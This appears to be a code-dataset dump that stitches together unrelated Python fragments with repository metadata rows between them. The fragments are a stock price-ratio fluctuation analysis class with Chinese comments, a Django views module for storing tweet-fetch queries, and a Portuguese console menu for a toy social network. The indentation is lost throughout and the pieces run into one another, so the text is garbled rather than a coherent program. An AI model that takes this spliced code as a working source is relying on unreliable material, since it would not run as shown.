myGlobal.logger.info("newTicker for multistock policy:%s,meanLen:%d" % (json.dumps(self.stocks), self.meanLen))
#取出各个股票收盘价
#然后计算各股与第一个股票的收盘价比值
#剔除inf量
#计算比值的30天均值
#计算比值相对比值均值的偏差
#取出各个股票收盘价
Close=None
for stock in self.stocks:
res=self.DbEx_GetDataByTitle(stock, ['Date', 'AdjClose'], outDataFormat=np.float32)
#转化为pandas格式
#tempData=pd.DataFrame(res[:,1], index=res[:,0].tolist(), columns=[stock])
tempData=pd.DataFrame(res, columns=['Date', stock])
try:
if not Close:
Close=tempData
except:
#合并数据,以左右的index作为索引,由于没有指定"how",所以保留左右数据的index的交集
Close=pd.merge(Close, tempData, on='Date')
Close = Close.sort_values(by=['Date'])
refStock=self.stocks[0]
#然后计算各股与第一个股票的收盘价比值
CloseRate=Close.copy(deep=True)
for stock in reversed(self.stocks):
CloseRate[stock]=CloseRate[stock]/CloseRate[refStock]
#剔除inf量,由于前面在合并数据时已经剔除了各个股票的停牌日,所以这一本来就不应该有无效值
assert not CloseRate.isnull().values.any()
#计算比值的meanLen天均值--均比值
rateMeans=CloseRate.copy(deep=True)
for stock in self.stocks:
rateMeans[stock]=rateMeans[stock].rolling(window=self.meanLen,center=False).mean()
rateMeans.fillna(value=1.0, inplace=True)
#求比值相对于比值均值的波动
rateFluctuation=rateMeans.copy(deep=True)
for stock in self.stocks:
rateFluctuation[stock]=CloseRate[stock]-rateMeans[stock]
#生成便于阅读的日期格式
Close['DateString']=list(map(lambda x: BaseFunc().num2datestr(x), Close['Date']))
#保存到文件中 Close,CloseRate,rateMeans,rateFluctuation
saveData=pd.merge(Close, CloseRate.rename(index=str, columns=dict(zip(self.stocks,map(lambda x:"CloseRate_"+x, self.stocks)))), on='Date')
saveData=pd.merge(saveData, rateMeans.rename(index=str, columns=dict(zip(self.stocks,map(lambda x:"rateMeans_"+x, self.stocks)))), on='Date')
saveData=pd.merge(saveData, rateFluctuation.rename(index=str, columns=dict(zip(self.stocks,map(lambda x:"rateFluctuation_"+x, self.stocks)))), on='Date')
saveData.to_csv(os.path.join(config.tempOutDataDir, self.StockClass+'_pricerate_fluctuation_multistock_'+str(self.meanLen)+'.csv'))
#到这里,需要的数据都已经计算并保存到文件中。
#为了方便后期处理,这里将必要的数据进行处理
self.result=[]
for stock in self.stocks:
self.result.append([stock, rateFluctuation[stock].tolist()[-1]])
self.result.sort(key=lambda x:x[1], reverse=False)
return
class observer_PriceFluctuation_MultiStock_DailyClose(Observer):
def __init__(self):
#some my code here
self.actors=[]
self.meanLenArray=[5,8,10,12,20] #days
#thresholdArray=[0.005,0.010,0.015,0.020]
for stockType in config.stockList.keys():
#some type of stock
stockListTemp=[item[0] for item in config.stockList[stockType]]
paraArray=[(stockListTemp, meanLen) for meanLen in self.meanLenArray]
self.actors+=[PriceFluctuation_MultiStock_DailyClose_Actor(item[0], item[1], stockType) for item in paraArray]
self.threadpool = ThreadPoolExecutor(max_workers=8)
super(observer_PriceFluctuation_MultiStock_DailyClose, self).__init__()
def end_opportunity_finder(self):
for actor in self.actors:
#每个actor的维度是(同类的一组股票,均线mean长度)
try:
actor.selfLogger ('info', "<end><meanlen:%d><stockClass:%s>" % (actor.meanLen, actor.StockClass))
infoString="Best policy for MultiStocks (StockClass=%s) (meanLen=%d) is buy stock %s.(%s)" % (actor.StockClass, actor.meanLen, actor.result[0][0], json.dumps(actor.result))
myGlobal.logger.info(infoString)
try:
with open('MailOutInfo.txt', 'a') as pf:
pf.write(infoString+'\r\n')
except:
pass
objfilename=os.path.join(config.tempOutDataDir, actor.StockClass+'_pricerate_fluctuation_multistock_'+str(actor.meanLen)+'.csv')
myGlobal.attachMailFileList.append(objfilename)
except Exception as err:
print (err)
print(traceback.format_exc())
#actor.selfLogger ('error', err)
#这里进行绘图
for actor in self.actors:
try:
if actor.meanLen != self.meanLenArray[0]:
continue
bestThreeStock=[item for item in actor.result if item[0]!=config.stockList[actor.StockClass][0][0]]
#读取actor.StockClass+'_pricerate_fluctuation_multistock_'+str(actor.meanLen)+'.csv'文件
objfilename=objfilename=os.path.join(config.tempOutDataDir, actor.StockClass+'_pricerate_fluctuation_multistock_'+str(actor.meanLen)+'.csv')
df = pd.read_csv(objfilename, encoding='gbk')
#获取bestThreeStock[0][0],bestThreeStock[1][0],bestThreeStock[2][0]三个stock的rateFluctuation_60xxxx.ss曲线
drawLineNum=min(len(bestThreeStock),3)
drawData=df[['rateFluctuation_'+bestThreeStock[i][0] for i in range(drawLineNum)]].copy(deep=True)
xLen=30
x=np.array(range(xLen))
yList=[np.array(drawData['rateFluctuation_'+bestThreeStock[i][0]])[-xLen:] for i in range(drawLineNum)]
jpgFilename=objfilename.replace('.csv', '.jpg')
MyDrawing().drawCurve(x, yList, lineName=[bestThreeStock[i][0] for i in range(drawLineNum)], outfile=jpgFilename, title=actor.StockClass+'_'+str(actor.meanLen), xlabel='Date', ylabel='Values')
myGlobal.attachMailFileList.append(jpgFilename)
except Exception as err:
print (err)
print(traceback.format_exc())
pass
def opportunity(self):
if False:
futures = []
for actor in self.actors:
futures.append(self.threadpool.submit(actor.newTicker))
wait(futures)
else:
for actor in self.actors:
try:
actor.newTicker()
except Exception as err:
print (err)
print(traceback.format_exc())
actor.selfLogger ('error', err) | [
"abednego1979@163.com"
] | abednego1979@163.com |
0f82382175538ed0c951b9a4c59db262db7e5556 | 969776e5af5b190dd579c710a86f8b9e0382e9ff | /twittertools/tweetfetch/views.py | a8fd22d8a74b893c575f7b0a3b3a5b0b14014ec8 | [] | no_license | krdpk17/django-twitter | b36a2ee0e565e53ed1af4b57f204a0467d27206c | 37840a1835987250ae4731f9d9f63e4f517d0b08 | refs/heads/master | 2023-04-22T13:37:02.221538 | 2021-04-26T08:41:20 | 2021-04-26T08:41:20 | 262,332,817 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,772 | py | from django.views import generic
from django.views.generic.edit import CreateView, UpdateView, DeleteView
from django.urls import reverse_lazy
from django.shortcuts import render, redirect
from django.views.generic import View, ListView
from django.contrib import messages
from .forms import FetcherCreateForm
from .fetcher_db_intf import store_fetch_query, fetch_all_queries_by_user
from .models import Fetcher
from .tables import FetcherTable
class IndexView(generic.ListView):
template_name = 'tweetfetch/index.html'
def get_queryset(self):
return
class CommandList(ListView):
template_name = 'table_template.html'
fetcher_table = FetcherTable
def get(self, request):
queries = fetch_all_queries_by_user(request.user)
table = self.fetcher_table(queries)
#istekler = queries.all()
return render(request, self.template_name, locals())
def post(self, request):
pass
class CommandCreate(CreateView):
form_class = FetcherCreateForm
success_url = reverse_lazy('tweetsfetch:index')
template_name = 'tweetfetch/fetcher_form.html'
def get(self, request):
form = self.form_class(None)
context = {'form': form}
return render(request, self.template_name, context)
def post(self, request):
form = self.form_class(request.POST)
context = {'form': form}
#Store this info in the Database
status = store_fetch_query(form.data, request.user)
if status:
messages.success(request, 'Stored query in the DB')
return redirect('tweetfetch:index')
else:
messages.error(request, 'Failed to store query. Please retry')
return render(request, self.template_name, context) | [
"62544105+krdpk1717@users.noreply.github.com"
] | 62544105+krdpk1717@users.noreply.github.com |
88c6f9687795855780c7f84d69dc1ac0aaf87deb | eff3b7a036be3191b8844364339c2c36c5cadc5b | /sistema.py | ac18f36c924b8deb5311ba56d101bdf37f2da85d | [] | no_license | eliabepaz/rede_social | bfde47d7defb71f2f416437299e9fbc1bb475950 | bbef6446999ed64f5b7c56e812425b0ff9cf3d56 | refs/heads/master | 2021-09-07T02:00:13.211422 | 2018-02-15T12:20:18 | 2018-02-15T12:20:18 | 109,072,042 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,140 | py | from acounts import Bd
from acounts import Conta
from acounts import Loguin
from feed import Perfil
banco = Bd()
log = Loguin()
perfil = Perfil()
class Sistem:
def __init__(self):
pass
def menu(self):
print('1 - Cadastrar conta')
print('2 - Loguin')
print('x - Sair')
opcao = input('Digite a opção: ')
if opcao == '1':
usuario = Conta
usuario.nome = input('Digite seu nome: ')
usuario.idade = input('Digite sua idade: ')
usuario.telefone = input('Digite seu telefone: ')
usuario.endereco = input('Digite seu endereço: ')
log.email = input('Digite seu email: ')
log.senha = input('Digite sua senha: ')
banco.insert_user(usuario,log)
if opcao == '2':
email = input('Digite seu email: ')
senha = input('Digite sua senha: ')
if email in log.email and senha in log.senha:
opc = ''
while opc != 'x':
opc = perfil.menu_feed(email, senha)
return(opcao)
| [
"noreply@github.com"
] | noreply@github.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.